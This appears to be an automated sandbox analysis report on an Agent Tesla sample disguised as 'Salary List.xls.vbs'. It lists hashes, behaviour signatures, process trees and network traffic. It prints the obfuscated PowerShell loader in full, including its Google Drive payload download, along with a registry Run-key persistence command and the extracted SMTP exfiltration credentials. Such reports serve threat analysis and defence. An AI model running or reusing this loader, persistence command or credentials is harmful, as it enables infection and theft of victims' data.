Analysis

  • max time kernel
    146s
  • max time network
    144s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    31/05/2024, 13:12 UTC

General

  • Target

    Salary List.xls.vbs

  • Size

    1.1MB

  • MD5

    895c0c58f0e05a6b30b1b1956e76c16b

  • SHA1

    e56fc2959189ec7a520cbc17703ea3aa4550253c

  • SHA256

    4de05aee1a99ea577443c742aa6c1ce05e88c3c716c234f1d1598c2e648486da

  • SHA512

    51ee9a36c1f8b3a1c4dc17d8b823da8abcc78002fe4c81ae22010107f8f5536b7dde7217e662bc5feed85305629fc1b730e7cc25cd01ab83bf8c5b69c44faeb8

  • SSDEEP

    12288:j31cvBzbU01qal638iNX3iTMgmuYtWN/ZgMiQPeRj+:jYz64+2Sj+

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:
    smtp
  • Host:
    mail.myhydropowered.com
  • Port:
    587
  • Username:
    amazinggrace@myhydropowered.com
  • Password:
    JAyhAGxxVOdW6FW
  • Email To:
    power2prosper@myhydropowered.com

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in Visual Basic.

  • Blocklisted process makes network request (2 IoCs)
  • Adds Run key to start application (2 TTPs, 2 IoCs)
  • Legitimate hosting services abused for malware hosting/C2 (1 TTP, 3 IoCs)
  • Looks up external IP address via web service (3 IoCs)

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger (1 IoC)
  • Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoC)
  • Modifies registry key (1 TTP, 1 IoC)
  • Suspicious behavior: EnumeratesProcesses (3 IoCs)
  • Suspicious use of AdjustPrivilegeToken (2 IoCs)
  • Suspicious use of WriteProcessMemory (18 IoCs)

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Salary List.xls.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1876
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Rekruttere='S';$Rekruttere+='ubs';$Rekruttere+='tri';$slanterne = 1;$Rekruttere+='ng';Function Auricyanhydric($Pandaric){$Microcytic=$Pandaric.Length-$slanterne;For( $Eurobarometer=7;$Eurobarometer -lt $Microcytic;$Eurobarometer+=8){$Semuncia+=$Pandaric.$Rekruttere.Invoke( $Eurobarometer, $slanterne);}$Semuncia;}function Forskerholdene($Countergambit){ . ($Accumber) ($Countergambit);}$Spartina=Auricyanhydric 'Ettals M Holo,hoW ooplaz CherimiLreproglCapricolPincustaDeliriu/Burnyko5 Chutzp.Micropa0Blephar pumpkin(Nonc nsWTrihal.iLappingnGensta d UdvikloNlnyhedw Horn.esAdenine RespektNGrafikmT.oshsca selvcen1Forsynd0Handels.Dvalent0Al,erta; Motetu K ingesWPectiniiApotheonTistyks6Grum ab4Tegnese;Genial. OmfavnexCeliosc6Bluster4Crispie;drjed.r Enkroner MorgenvGgeblom:E,ulger1Con,hom2 ,apper1Sphy ni.Forhjet0Filt.rp)Underta FremtoGTur,aboeEndotrocG.usgrak NotendoLittesa/Deq.een2Maniske0 To.vta1Suppler0 nordst0,ubjekt1Ekspone0Sindsop1Oranunp DetekteF Noncrii akkedrrUnder de EnkeltfLogiskeoKviltnixFrifind/Beskriv1Prefixi2 Stavri1Fremb,d.Ant,sep0Velform ';$Dilatableness=Auricyanhydric ',eltlngUTechnicsOpsigeledrivh sr ncleri- paulseA edeliggSnvledeeTjenestn DatabatAkademi ';$Isalena=Auricyanhydric 'BlusserhSkyggertViolonctUnretropAndelslsC,ttonw:Re rutt/ Dalbyd/ VejrsadVildtbirAn.enbeiFeltprsv Encradeschf.re.Magtensg Cyk,ltoSafterno ActivagBlowh,lledinb.re Superv.Demifusc Al,neao enialm Hastat/No,evocuSuperimcQuick e?Salatste moralxU garnfpMacrop oGastrotrTrmlksftRosolic=T.stubbd Phobiso CirkelwKonsis nAwmbriel AnorgaoMinerneaEn,gtendReducta& MelocoiSvin.ridSprogta=Skalspi1 AmourssVacil.aPRecapitJEvange,TVitialuE L.dsidOCly eniNUnprevev B.rgerCKonusidgTaboredXRacerenKasco.aruIncalveBN,ocubiqMisha toR gulatz LgehonoSydslesP,lyantsc HvervexUproot,WAffdtesxCameralhKulturpU.rswaywPReluctso LmlensKMuscled4EngembiUFormuliZSl vebok Optrk, ';$Modtagelsesdatoers=Auricyanhydric 'Ziriani>Indrapp 
';$Accumber=Auricyanhydric ' Per eriSkrmbileLytteapx Stormn ';$Sankthansaftnen187='Amargosos';$Hofternes = Auricyanhydric '.natosaeRattingcOrdflomh.sarevnoAandsvr Fralgge%Spil.emaTabbillppizzabap Aandigdabbedisa Tv,ngstBundskja.haeosp%Medvide\ ToddyeU Fyrr md Unve.eeAnkringnKitchpobSchi lio Pebe mrHvervetdTuppe,isVolita mKlov.eroTitalsltProvinsoafsyrburVarsomh.SnablenVNon.isceSudanerj Forel, Antil,t&Udvi kn& Cel,do GrousineClifforcMenstruhillianno ,ndert Unmixdytpatr,ar ';Forskerholdene (Auricyanhydric 'Accordi$BaraitagVirensjltren ieoBe.rdedb .sotroaAntilialArdoise:AstrophHBaroucheGransknt,lyawayzBelyingeDisscepnUnbluesskogalsk=Krympes(Borgerrc.fretnimProduktd.uvaere Tykning/Rein.ercReading Tilkbet$Uner.tiHGlycoluoAlligatfFallitbtTransece varmemrCawst.rnliberaleIn bilds,upaiau)Lanknes ');Forskerholdene (Auricyanhydric 'Mourns,$SkrivergSpiritulAst,nykoAccelerbC.eeredaklaringlIngust :cephaloO.eskripr WoodmagMononucaDesmerenFon.anei Tilbygs rndseaS.atshatHestek iKaolinsoLusketbnWildishsD.gsmaafSolsortoBoloismrLukewarmsm ltereDissembrplasmopnS.ersbyeRemortgs Fdsels=viftenk$SelvantIZ.oplassBisp.gaaIndkomslSpl,nteeUnre lenNinetyfa Une.fa.Merud isProstrapBalzar l,onkeyhidakoitst monami(Turtosa$PhthaleMPjalteroPhotosedAlvildst,nfundiaUnshr bgDwtan.eepromisclFremtvusBaelteseJolleymsSwellerdErhvervaFlirtpotOppo tuoCykelhae ,edhngrListesksMirijan)Fe tose ');$Isalena=$Organisationsformernes[0];$begets= (Auricyanhydric 'Justerv$Tetra rgFjeldsbl SkrddeoSubul.fbTrianguaUniflaglDatagru:masseprSCylindrl Dinaspi SlagtegKn,ldgah Pegam,tNonprudeisln.insvietnamt,tikker=.ntifonNBalkavaeP.lotsywFr,itil- Skin.fO NedskrbMindretjPlatodeeFodboldcInternetpneuma, PencilS translyGen.dtesLasarwotDronerseUredinemBlo,ste.DokumenNIntercoeGastrittTribula.SpaantaWStikline Smk.edbBen dicCPostphtlT strukiRectif e Ca,tionUla lart');$begets+=$Hetzens[1];Forskerholdene ($begets);Forskerholdene (Auricyanhydric ' Ko.dpr$Und rseSIntabullMusco,iiowe mang IntoxihOmvisentNonabraeAfrustnsLighedstIndikat.Jol 
erhH Sulfide Stive,aGenfremd UndereeF,otwayrRedirigssisterl[B.mrkni$ haunchDAe.uianiHigdo,llAerometaBorgerhtBa.projaUnfernlbGnomonil InsinueZebrablnCon opteIn,estesCommunisForblff]Afstikk=Wrainst$CenterlSAbdic,tptopchefa HoggyarDrouthitUmbrineiZoospgin,quirinaRomeite ');$alkoholikeren=Auricyanhydric 'informa$SlyngboS ultislC,nterhiIllustrgReshinehbygget,t EskimoeSmilaxes,ovbefatDissymm.SabrephD DokumeoGttforswSaalskanSljdenslTepott,o Na velaRealle.d E.hoisF Gains,iFarmhoulDaarekieLan.zon(Hor,oni$AntndelIKreditgsA,kerneaKommandl Webbieeabsolven VindtraKrimina,Imbalme$SikkerhnAbhorsaiBrn,vrntDipleurtAzotisie DeerhonProsomadCommentePaskvild S rmsteUnr.joilCapitol)Chlamyd ';$nittendedel=$Hetzens[0];Forskerholdene (Auricyanhydric 'Sany ko$TankanggNonneorl ubpharoslg.sprbEfter,aaHemme,ilG stero:I dkoblP FlaatsoBasi,idp DittemuTornirilHypother.nrealit Fuldst=G.ptisk(arbithfTKmpehjjefratruksAntagont anstte-OophoroP .appyraTillidstJaunbakhVestenv Ammunit$Woodbinn ldgreri O,egratPet,ysttIngmarse TransanLegsstidUnc nceevitessedDemarkseSpellinl famili)Filtrat ');while (!$Populrt) {Forskerholdene (Auricyanhydric 'O sedeu$Sylvag.gSvinghjl BurhnsoAnlgsa,b,etragra FakturlU verid:Weir,neSUr,tfrdc InkleseIndv,innBetalinaVagtannrTissemaiUdradersSkydelokTe ebri=svededr$Chancr tDataopsrRygepauu forste moundw ') ;Forskerholdene $alkoholikeren;Forskerholdene (Auricyanhydric 'BiavlerSUnitr.st nutcera pc,reirskrivestnavaho.-DrooptpSSkarnbol Bund,peHasheeseTrykkedpModef,l palisad4 Reg af ');Forskerholdene (Auricyanhydric 'Fyrsteh$Prefi,ugNontolelShaled.oSkjtekobHyposthaPat.oullRegimen:KlimatoPEksorbioC,arbocpRet.stauTrio.erlPopelyprTattleft Deltal=b,astoc(WhoduniTstyringeBrugtvosAb,orbatHusaren-BykernePMilj ttaDepictitSlu edehKrok.se G.veren$Ema lvonOrth cei StigmatTrveskrtUnaddede AdmiranDannebrd synseveHae athdSjoveree ejlslul vagin)Bogsurn ') ;Forskerholdene (Auricyanhydric 'vo.nman$ ubeh,fgOvera dlFilamenoMyosin,b,udevoraAscri,tl Embiot:Avan,gak.eurololPersonsuFormicadBru.secr 
alecheeDominikd,dendrseAccelers Kronpr=Abjects$StinkskgNige,ialWheeplioPrdikedb El ctratap,ttalOprinde:ZoolithN Ka erssSvingkatForle.eb Parodoe Livsted Un kkesTrommestTilm.ld+Torech +Luxk oa% Tobakk$BrakestO traykirsondringAmagermaSortebrnConidiui StdpudsAmbula.a Hi,hhatNavigatiEndot,eoLookywanIspindesSkolerafEfterudoOptagetrInter rmSecreteePolyp,ar OpvasknMo alpreCo partsSynskre. overlacFdrela,oJuris euNo.dmarn Udsalgt veteri ') ;$Isalena=$Organisationsformernes[$kludredes];}$Entosphenal=336951;$Storrums=29963;Forskerholdene (Auricyanhydric 'Voltmet$shfalmegFancifulRo,antioFrostklbBochu haInsolvel Affyri:Taks.noFarbejdslAngelicy.lurrinnSa,mensdoffsetteFluefanrtriska. S,apsu=Centerv UnpaupeG dis cieBestrewtUnslyma-Keg,estCSeptocoo DigitinleannestLandskaeTab.erinC.ntraltviewpoi Filator$lagdelinBeadrowiStrmerbtRullematD.cryoceOverir nUnvi.iodEm,owereBrne ykd AsympteBudgetmlLe,copl ');Forskerholdene (Auricyanhydric 'Ligfald$ToldeglgKlassislChiti.ooLen itubUk,alifaVeggierlBrmmer,:Da,elsmMTransyldNarkosed KnoxviiNettiesn Udpi.tg Se,rnesSk iveb Acanth= Blood Shog.p[ monophSKongresy ForsvasOve.skytDj,elske preautmFumete.. 
KntrenCindkraeo Tse idn ejevrvOpsgnineHaylagerPupemottCh,nger]Forward:Ordkomb:UdbasunFamtspolrContermoT,rapeumMuffi,hBVordingaConn tisEneta.ee Anlgsb6 Afdeli4Unmoat.SRitterstFlymekarBlaguebi Andr,gnDemiha.gJant.rp(transve$CunjevoFH,permnlAanderfyKat lyzn Stru,td BogtryeOuttalkrUtilfre) Ditet ');Forskerholdene (Auricyanhydric 'Reverse$embryopgIntertrlStrblinoSaft,olbCarpoidaPhoronilbaraltv:T,kerneRDaw sderHa,cucalDramatigTelesiagDemobileFul,ends Verbif Stofpri= Skille A,onine[gnomonfSUdlud.iy Simults SaudiatGa,troceSpidstemTempest.Hir,ellTFeru.ebeRkeb,skxReli,blt,elefon.LavningEFrygisknLegemulc SpherioDebarbadEpic leiTredjepnAfklippgNonvi.u]Frightl: Asepto:brachyaAUdklassS,olioviC BornylIChaf suIBewired.DutcherGArbej.seSindstitCastlewSToptekstTajgaenrVand aniJul kaknRaced sgGulfwee(Gnathon$AnhydreM SomnoldBulensad KastreiEndothrnprisonlgFarsotes Outwhi)Vest.ns ');Forskerholdene (Auricyanhydric ' .agtso$YogasangFormildl Str,ndoDermostb Gya.una B.ntuelDra ber:IncumbeHSiretlea.emelytlglsningvStraffelNonfalleD.umaslgHelnodesparce,erLode,srealeins,sSi elinuLe ningl,rosscutObolbliaIsl mistOvergrasW,tjarn=Sivathe$AmassetRForulykrSam,undlTyr.nneg Ho tesg KlumreeNiftinesInorna..InfragesPrferenu rembrbHela,tosUdgan.stRustederBhlamdei MediusnoctosylgDe,ylen(Overfou$SenilkoE ObituanMisfornt L ndedoNetma.esEstaminpVikingehaphrodie dr,matnPizzaeraArticullHeterop,Befugte$BalanceS Semi.at P eudaoKlistrirHardhe,rOffloadumorphopmTilvkstsVa.dtrd)Fravri, ');Forskerholdene $Halvlegsresultats;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:908
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Udenbordsmotor.Vej && echo t"
        3⤵
          PID:1936
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Rekruttere='S';$Rekruttere+='ubs';$Rekruttere+='tri';$slanterne = 1;$Rekruttere+='ng';Function Auricyanhydric($Pandaric){$Microcytic=$Pandaric.Length-$slanterne;For( $Eurobarometer=7;$Eurobarometer -lt $Microcytic;$Eurobarometer+=8){$Semuncia+=$Pandaric.$Rekruttere.Invoke( $Eurobarometer, $slanterne);}$Semuncia;}function Forskerholdene($Countergambit){ . ($Accumber) ($Countergambit);}$Spartina=Auricyanhydric 'Ettals M Holo,hoW ooplaz CherimiLreproglCapricolPincustaDeliriu/Burnyko5 Chutzp.Micropa0Blephar pumpkin(Nonc nsWTrihal.iLappingnGensta d UdvikloNlnyhedw Horn.esAdenine RespektNGrafikmT.oshsca selvcen1Forsynd0Handels.Dvalent0Al,erta; Motetu K ingesWPectiniiApotheonTistyks6Grum ab4Tegnese;Genial. OmfavnexCeliosc6Bluster4Crispie;drjed.r Enkroner MorgenvGgeblom:E,ulger1Con,hom2 ,apper1Sphy ni.Forhjet0Filt.rp)Underta FremtoGTur,aboeEndotrocG.usgrak NotendoLittesa/Deq.een2Maniske0 To.vta1Suppler0 nordst0,ubjekt1Ekspone0Sindsop1Oranunp DetekteF Noncrii akkedrrUnder de EnkeltfLogiskeoKviltnixFrifind/Beskriv1Prefixi2 Stavri1Fremb,d.Ant,sep0Velform ';$Dilatableness=Auricyanhydric ',eltlngUTechnicsOpsigeledrivh sr ncleri- paulseA edeliggSnvledeeTjenestn DatabatAkademi ';$Isalena=Auricyanhydric 'BlusserhSkyggertViolonctUnretropAndelslsC,ttonw:Re rutt/ Dalbyd/ VejrsadVildtbirAn.enbeiFeltprsv Encradeschf.re.Magtensg Cyk,ltoSafterno ActivagBlowh,lledinb.re Superv.Demifusc Al,neao enialm Hastat/No,evocuSuperimcQuick e?Salatste moralxU garnfpMacrop oGastrotrTrmlksftRosolic=T.stubbd Phobiso CirkelwKonsis nAwmbriel AnorgaoMinerneaEn,gtendReducta& MelocoiSvin.ridSprogta=Skalspi1 AmourssVacil.aPRecapitJEvange,TVitialuE L.dsidOCly eniNUnprevev B.rgerCKonusidgTaboredXRacerenKasco.aruIncalveBN,ocubiqMisha toR gulatz LgehonoSydslesP,lyantsc HvervexUproot,WAffdtesxCameralhKulturpU.rswaywPReluctso LmlensKMuscled4EngembiUFormuliZSl vebok Optrk, ';$Modtagelsesdatoers=Auricyanhydric 'Ziriani>Indrapp 
';$Accumber=Auricyanhydric ' Per eriSkrmbileLytteapx Stormn ';$Sankthansaftnen187='Amargosos';$Hofternes = Auricyanhydric '.natosaeRattingcOrdflomh.sarevnoAandsvr Fralgge%Spil.emaTabbillppizzabap Aandigdabbedisa Tv,ngstBundskja.haeosp%Medvide\ ToddyeU Fyrr md Unve.eeAnkringnKitchpobSchi lio Pebe mrHvervetdTuppe,isVolita mKlov.eroTitalsltProvinsoafsyrburVarsomh.SnablenVNon.isceSudanerj Forel, Antil,t&Udvi kn& Cel,do GrousineClifforcMenstruhillianno ,ndert Unmixdytpatr,ar ';Forskerholdene (Auricyanhydric 'Accordi$BaraitagVirensjltren ieoBe.rdedb .sotroaAntilialArdoise:AstrophHBaroucheGransknt,lyawayzBelyingeDisscepnUnbluesskogalsk=Krympes(Borgerrc.fretnimProduktd.uvaere Tykning/Rein.ercReading Tilkbet$Uner.tiHGlycoluoAlligatfFallitbtTransece varmemrCawst.rnliberaleIn bilds,upaiau)Lanknes ');Forskerholdene (Auricyanhydric 'Mourns,$SkrivergSpiritulAst,nykoAccelerbC.eeredaklaringlIngust :cephaloO.eskripr WoodmagMononucaDesmerenFon.anei Tilbygs rndseaS.atshatHestek iKaolinsoLusketbnWildishsD.gsmaafSolsortoBoloismrLukewarmsm ltereDissembrplasmopnS.ersbyeRemortgs Fdsels=viftenk$SelvantIZ.oplassBisp.gaaIndkomslSpl,nteeUnre lenNinetyfa Une.fa.Merud isProstrapBalzar l,onkeyhidakoitst monami(Turtosa$PhthaleMPjalteroPhotosedAlvildst,nfundiaUnshr bgDwtan.eepromisclFremtvusBaelteseJolleymsSwellerdErhvervaFlirtpotOppo tuoCykelhae ,edhngrListesksMirijan)Fe tose ');$Isalena=$Organisationsformernes[0];$begets= (Auricyanhydric 'Justerv$Tetra rgFjeldsbl SkrddeoSubul.fbTrianguaUniflaglDatagru:masseprSCylindrl Dinaspi SlagtegKn,ldgah Pegam,tNonprudeisln.insvietnamt,tikker=.ntifonNBalkavaeP.lotsywFr,itil- Skin.fO NedskrbMindretjPlatodeeFodboldcInternetpneuma, PencilS translyGen.dtesLasarwotDronerseUredinemBlo,ste.DokumenNIntercoeGastrittTribula.SpaantaWStikline Smk.edbBen dicCPostphtlT strukiRectif e Ca,tionUla lart');$begets+=$Hetzens[1];Forskerholdene ($begets);Forskerholdene (Auricyanhydric ' Ko.dpr$Und rseSIntabullMusco,iiowe mang IntoxihOmvisentNonabraeAfrustnsLighedstIndikat.Jol 
erhH Sulfide Stive,aGenfremd UndereeF,otwayrRedirigssisterl[B.mrkni$ haunchDAe.uianiHigdo,llAerometaBorgerhtBa.projaUnfernlbGnomonil InsinueZebrablnCon opteIn,estesCommunisForblff]Afstikk=Wrainst$CenterlSAbdic,tptopchefa HoggyarDrouthitUmbrineiZoospgin,quirinaRomeite ');$alkoholikeren=Auricyanhydric 'informa$SlyngboS ultislC,nterhiIllustrgReshinehbygget,t EskimoeSmilaxes,ovbefatDissymm.SabrephD DokumeoGttforswSaalskanSljdenslTepott,o Na velaRealle.d E.hoisF Gains,iFarmhoulDaarekieLan.zon(Hor,oni$AntndelIKreditgsA,kerneaKommandl Webbieeabsolven VindtraKrimina,Imbalme$SikkerhnAbhorsaiBrn,vrntDipleurtAzotisie DeerhonProsomadCommentePaskvild S rmsteUnr.joilCapitol)Chlamyd ';$nittendedel=$Hetzens[0];Forskerholdene (Auricyanhydric 'Sany ko$TankanggNonneorl ubpharoslg.sprbEfter,aaHemme,ilG stero:I dkoblP FlaatsoBasi,idp DittemuTornirilHypother.nrealit Fuldst=G.ptisk(arbithfTKmpehjjefratruksAntagont anstte-OophoroP .appyraTillidstJaunbakhVestenv Ammunit$Woodbinn ldgreri O,egratPet,ysttIngmarse TransanLegsstidUnc nceevitessedDemarkseSpellinl famili)Filtrat ');while (!$Populrt) {Forskerholdene (Auricyanhydric 'O sedeu$Sylvag.gSvinghjl BurhnsoAnlgsa,b,etragra FakturlU verid:Weir,neSUr,tfrdc InkleseIndv,innBetalinaVagtannrTissemaiUdradersSkydelokTe ebri=svededr$Chancr tDataopsrRygepauu forste moundw ') ;Forskerholdene $alkoholikeren;Forskerholdene (Auricyanhydric 'BiavlerSUnitr.st nutcera pc,reirskrivestnavaho.-DrooptpSSkarnbol Bund,peHasheeseTrykkedpModef,l palisad4 Reg af ');Forskerholdene (Auricyanhydric 'Fyrsteh$Prefi,ugNontolelShaled.oSkjtekobHyposthaPat.oullRegimen:KlimatoPEksorbioC,arbocpRet.stauTrio.erlPopelyprTattleft Deltal=b,astoc(WhoduniTstyringeBrugtvosAb,orbatHusaren-BykernePMilj ttaDepictitSlu edehKrok.se G.veren$Ema lvonOrth cei StigmatTrveskrtUnaddede AdmiranDannebrd synseveHae athdSjoveree ejlslul vagin)Bogsurn ') ;Forskerholdene (Auricyanhydric 'vo.nman$ ubeh,fgOvera dlFilamenoMyosin,b,udevoraAscri,tl Embiot:Avan,gak.eurololPersonsuFormicadBru.secr 
alecheeDominikd,dendrseAccelers Kronpr=Abjects$StinkskgNige,ialWheeplioPrdikedb El ctratap,ttalOprinde:ZoolithN Ka erssSvingkatForle.eb Parodoe Livsted Un kkesTrommestTilm.ld+Torech +Luxk oa% Tobakk$BrakestO traykirsondringAmagermaSortebrnConidiui StdpudsAmbula.a Hi,hhatNavigatiEndot,eoLookywanIspindesSkolerafEfterudoOptagetrInter rmSecreteePolyp,ar OpvasknMo alpreCo partsSynskre. overlacFdrela,oJuris euNo.dmarn Udsalgt veteri ') ;$Isalena=$Organisationsformernes[$kludredes];}$Entosphenal=336951;$Storrums=29963;Forskerholdene (Auricyanhydric 'Voltmet$shfalmegFancifulRo,antioFrostklbBochu haInsolvel Affyri:Taks.noFarbejdslAngelicy.lurrinnSa,mensdoffsetteFluefanrtriska. S,apsu=Centerv UnpaupeG dis cieBestrewtUnslyma-Keg,estCSeptocoo DigitinleannestLandskaeTab.erinC.ntraltviewpoi Filator$lagdelinBeadrowiStrmerbtRullematD.cryoceOverir nUnvi.iodEm,owereBrne ykd AsympteBudgetmlLe,copl ');Forskerholdene (Auricyanhydric 'Ligfald$ToldeglgKlassislChiti.ooLen itubUk,alifaVeggierlBrmmer,:Da,elsmMTransyldNarkosed KnoxviiNettiesn Udpi.tg Se,rnesSk iveb Acanth= Blood Shog.p[ monophSKongresy ForsvasOve.skytDj,elske preautmFumete.. 
KntrenCindkraeo Tse idn ejevrvOpsgnineHaylagerPupemottCh,nger]Forward:Ordkomb:UdbasunFamtspolrContermoT,rapeumMuffi,hBVordingaConn tisEneta.ee Anlgsb6 Afdeli4Unmoat.SRitterstFlymekarBlaguebi Andr,gnDemiha.gJant.rp(transve$CunjevoFH,permnlAanderfyKat lyzn Stru,td BogtryeOuttalkrUtilfre) Ditet ');Forskerholdene (Auricyanhydric 'Reverse$embryopgIntertrlStrblinoSaft,olbCarpoidaPhoronilbaraltv:T,kerneRDaw sderHa,cucalDramatigTelesiagDemobileFul,ends Verbif Stofpri= Skille A,onine[gnomonfSUdlud.iy Simults SaudiatGa,troceSpidstemTempest.Hir,ellTFeru.ebeRkeb,skxReli,blt,elefon.LavningEFrygisknLegemulc SpherioDebarbadEpic leiTredjepnAfklippgNonvi.u]Frightl: Asepto:brachyaAUdklassS,olioviC BornylIChaf suIBewired.DutcherGArbej.seSindstitCastlewSToptekstTajgaenrVand aniJul kaknRaced sgGulfwee(Gnathon$AnhydreM SomnoldBulensad KastreiEndothrnprisonlgFarsotes Outwhi)Vest.ns ');Forskerholdene (Auricyanhydric ' .agtso$YogasangFormildl Str,ndoDermostb Gya.una B.ntuelDra ber:IncumbeHSiretlea.emelytlglsningvStraffelNonfalleD.umaslgHelnodesparce,erLode,srealeins,sSi elinuLe ningl,rosscutObolbliaIsl mistOvergrasW,tjarn=Sivathe$AmassetRForulykrSam,undlTyr.nneg Ho tesg KlumreeNiftinesInorna..InfragesPrferenu rembrbHela,tosUdgan.stRustederBhlamdei MediusnoctosylgDe,ylen(Overfou$SenilkoE ObituanMisfornt L ndedoNetma.esEstaminpVikingehaphrodie dr,matnPizzaeraArticullHeterop,Befugte$BalanceS Semi.at P eudaoKlistrirHardhe,rOffloadumorphopmTilvkstsVa.dtrd)Fravri, ');Forskerholdene $Halvlegsresultats;"
          3⤵
            PID:2172
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Udenbordsmotor.Vej && echo t"
              4⤵
                PID:2724
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe"
                4⤵
                • Adds Run key to start application
                • Suspicious use of NtCreateThreadExHideFromDebugger
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:2584
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Boligforeningers% -w 1 $Fllesbetegnelser=(Get-ItemProperty -Path 'HKCU:\Kneepads\').Oocystis;%Boligforeningers% ($Fllesbetegnelser)"
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2396
                  • C:\Windows\SysWOW64\reg.exe
                    REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Boligforeningers% -w 1 $Fllesbetegnelser=(Get-ItemProperty -Path 'HKCU:\Kneepads\').Oocystis;%Boligforeningers% ($Fllesbetegnelser)"
                    6⤵
                    • Adds Run key to start application
                    • Modifies registry key
                    PID:2532

        Network

        • [US]
          DNS
          drive.google.com
          wab.exe
          Remote address:
          8.8.8.8:53
          Request
          drive.google.com
          IN A
          Response
          drive.google.com
          IN A
          142.250.187.238
        • [GB]
          GET
          https://drive.google.com/uc?export=download&id=1sPJTEONvCgXKuBqozoPcxWxhUPoK4UZk
          powershell.exe
          Remote address:
          142.250.187.238:443
          Request
          GET /uc?export=download&id=1sPJTEONvCgXKuBqozoPcxWxhUPoK4UZk HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
          Host: drive.google.com
          Connection: Keep-Alive
          Response
          HTTP/1.1 303 See Other
          Content-Type: application/binary
          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
          Pragma: no-cache
          Expires: Mon, 01 Jan 1990 00:00:00 GMT
          Date: Fri, 31 May 2024 13:12:17 GMT
          Location: https://drive.usercontent.google.com/download?id=1sPJTEONvCgXKuBqozoPcxWxhUPoK4UZk&export=download
          Strict-Transport-Security: max-age=31536000
          Cross-Origin-Opener-Policy: same-origin
          Content-Security-Policy: script-src 'nonce-3HzHvLE1G30X36kfcrddEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
          Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
          Server: ESF
          Content-Length: 0
          X-XSS-Protection: 0
          X-Frame-Options: SAMEORIGIN
          X-Content-Type-Options: nosniff
          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
        • [US]
          DNS
          drive.usercontent.google.com
          wab.exe
          Remote address:
          8.8.8.8:53
          Request
          drive.usercontent.google.com
          IN A
          Response
          drive.usercontent.google.com
          IN A
          142.250.179.225
        • [GB]
          GET
          https://drive.usercontent.google.com/download?id=1sPJTEONvCgXKuBqozoPcxWxhUPoK4UZk&export=download
          powershell.exe
          Remote address:
          142.250.179.225:443
          Request
          GET /download?id=1sPJTEONvCgXKuBqozoPcxWxhUPoK4UZk&export=download HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
          Host: drive.usercontent.google.com
          Connection: Keep-Alive
          Response
          HTTP/1.1 200 OK
          Content-Type: application/octet-stream
          Content-Security-Policy: sandbox
          Content-Security-Policy: default-src 'none'
          Content-Security-Policy: frame-ancestors 'none'
          X-Content-Security-Policy: sandbox
          Cross-Origin-Opener-Policy: same-origin
          Cross-Origin-Embedder-Policy: require-corp
          Cross-Origin-Resource-Policy: same-site
          X-Content-Type-Options: nosniff
          Content-Disposition: attachment; filename="Eftergre.afm"
          Access-Control-Allow-Origin: *
          Access-Control-Allow-Credentials: false
